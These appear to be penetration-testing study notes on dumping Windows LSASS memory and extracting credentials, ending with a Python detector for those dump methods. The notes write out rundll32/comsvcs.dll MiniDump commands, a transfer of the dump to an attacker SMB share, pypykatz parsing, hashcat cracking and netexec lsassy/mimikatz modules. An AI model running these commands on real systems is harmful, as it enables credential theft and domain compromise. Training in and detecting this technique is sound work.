# LSASS Introduction

- LSASS is a core Windows process responsible for enforcing security policies, handling user authentication, and storing sensitive credential material in memory
- Upon initial logon, LSASS will:
    - Cache credentials locally in memory
    - Create [access tokens](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens)
    - Enforce security policies
    - Write to Windows' [security log](https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-security)

# Dumping LSASS process memory

## Task Manager Method

- When we have interactive GUI access to the target:
    1. Open `Task Manager`
    2. Select the `Processes` tab
    3. Find and right-click the `Local Security Authority Process`
    4. Select `Create dump file`; the dump is named `lsass.dmp` and saved in `%temp%`
    5. Transfer it to the Kali host for manipulation

![[images/Pasted image 20251008084452.png]]

## Rundll32.exe & Comsvcs.dll Method

- Use the `rundll32.exe` utility from CMD (or PowerShell) to dump LSASS process memory
- First, identify the PID of `lsass.exe`
- Second, dump it to a file using `rundll32.exe`

```cmd
:: find the LSASS PID with CMD
tasklist /svc
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <PID> lsass.dmp full
```

```powershell
# find the LSASS PID with PowerShell
Get-Process lsass
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full
```

![[images/Pasted image 20251008100531.png]]

# Move lsass.dmp to Kali host

```bash
# set up an SMB share on the Kali host
sudo impacket-smbserver share -smb2support /home/jacob/   # creates an SMB share named "share" at the given path
```

```powershell
# move lsass.dmp to the Kali host
move lsass.dmp \\<kali_host_ip>\share
```

![[images/Pasted image 20251008100549.png]]

# Using Pypykatz to extract creds from lsass.dmp file

- `Mimikatz` only runs on Windows systems, so to use it we would either need a Windows attack host or we would need to run `Mimikatz` directly on the target
- `Pypykatz` is an implementation of `Mimikatz` written entirely in Python
- This makes `Pypykatz` an appealing alternative because all we need is a copy of the dump file on our Kali host, and we can extract creds from the dump file offline

```bash
# after moving lsass.dmp to the Kali host, run pypykatz
pypykatz lsa minidump /path/lsass.dmp
```

- Information `pypykatz` prints per logon session after parsing `lsass.dmp`:
    - **MSV**: authentication package in Windows that LSA calls on to validate logon attempts against the SAM database
        - Yields the `SID`, `Username`, `Domain`, and even the `NT` & `SHA1` password hashes for users
    - **WDIGEST**: older authentication protocol enabled by default from `Windows XP` through `Windows 8` and from `Windows Server 2003` through `Windows Server 2012`
        - LSASS caches credentials used by WDIGEST in clear-text
    - **Kerberos**: network authentication protocol used by Active Directory in Windows Domain environments
        - LSASS caches `passwords`, `ekeys`, `tickets`, and `pins` associated with Kerberos; it is possible to extract these from LSASS process memory and use them to access other systems joined to the same domain
    - **DPAPI**: masterkeys are extracted for logged-on users whose data is present in LSASS process memory
        - Masterkeys can then be used to decrypt the secrets associated with each of the applications using DPAPI, resulting in the capture of credentials for various accounts

## Crack NT hash for user from MSV info

```bash
sudo hashcat -m 1000 '<hash>' /usr/share/wordlists/rockyou.txt
```

![[images/Pasted image 20251008100824.png]]

# Use Netexec

```bash
netexec smb <target_ip> -u <username> -p <password> -M lsassy
netexec smb <target_ip> -u <username> -p <password> -M mimikatz
netexec smb <target_ip> -u <username> -p <password> -M procdump
```
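Every method above leaves telemetry a defender can key on: the `rundll32`/`comsvcs.dll MiniDump` command line, a process opening `lsass.exe` with memory-read access, and a dump file named after lsass landing on disk. The following is an added example, not part of the original notes, that flags Sysmon-style records for those three signals; the event records are constructed, and the access-mask heuristic (flag only when `PROCESS_VM_READ` is granted, so routine limited-information queries of lsass are ignored) is an assumption of this example.

```python
"""Flag constructed Sysmon-style events matching the LSASS dump methods above.

Field names follow Sysmon Event ID 1 (ProcessCreate), 10 (ProcessAccess)
and 11 (FileCreate); the sample values below are made up, not real telemetry.
"""
import re

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory

# Event ID 1: the comsvcs.dll MiniDump invocation, with or without the comma.
COMSVCS_MINIDUMP = re.compile(r"comsvcs\.dll\s*,?\s*minidump", re.IGNORECASE)


def detect(event: dict) -> list[str]:
    """Return the indicators this event matches (empty list when benign)."""
    hits = []
    eid = event.get("EventID")
    if eid == 1:
        cmd = event.get("CommandLine", "")
        if "rundll32" in cmd.lower() and COMSVCS_MINIDUMP.search(cmd):
            hits.append("rundll32 comsvcs.dll MiniDump command line")
    elif eid == 10:
        target = event.get("TargetImage", "").lower()
        access = int(event.get("GrantedAccess", "0x0"), 16)
        # Many legitimate processes query lsass with 0x1000 (limited info);
        # only a handle that can read its memory is interesting here.
        if target.endswith("\\lsass.exe") and access & PROCESS_VM_READ:
            hits.append(f"lsass.exe opened with PROCESS_VM_READ (0x{access:X})")
    elif eid == 11:
        name = event.get("TargetFilename", "").lower()
        if name.endswith(".dmp") and "lsass" in name:
            hits.append("dump file named after lsass written to disk")
    return hits


# Constructed sample events (assumed values, laid out as Sysmon would log them).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 11, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\lsass.DMP"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\notes.txt"},
]


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map the index of each flagged event to the indicators it matched."""
    return {i: hits for i, ev in enumerate(events) if (hits := detect(ev))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, hits)
```

The svchost record with `GrantedAccess` `0x1000` is deliberately left unflagged; alerting on every handle to lsass is the usual source of noise in this rule.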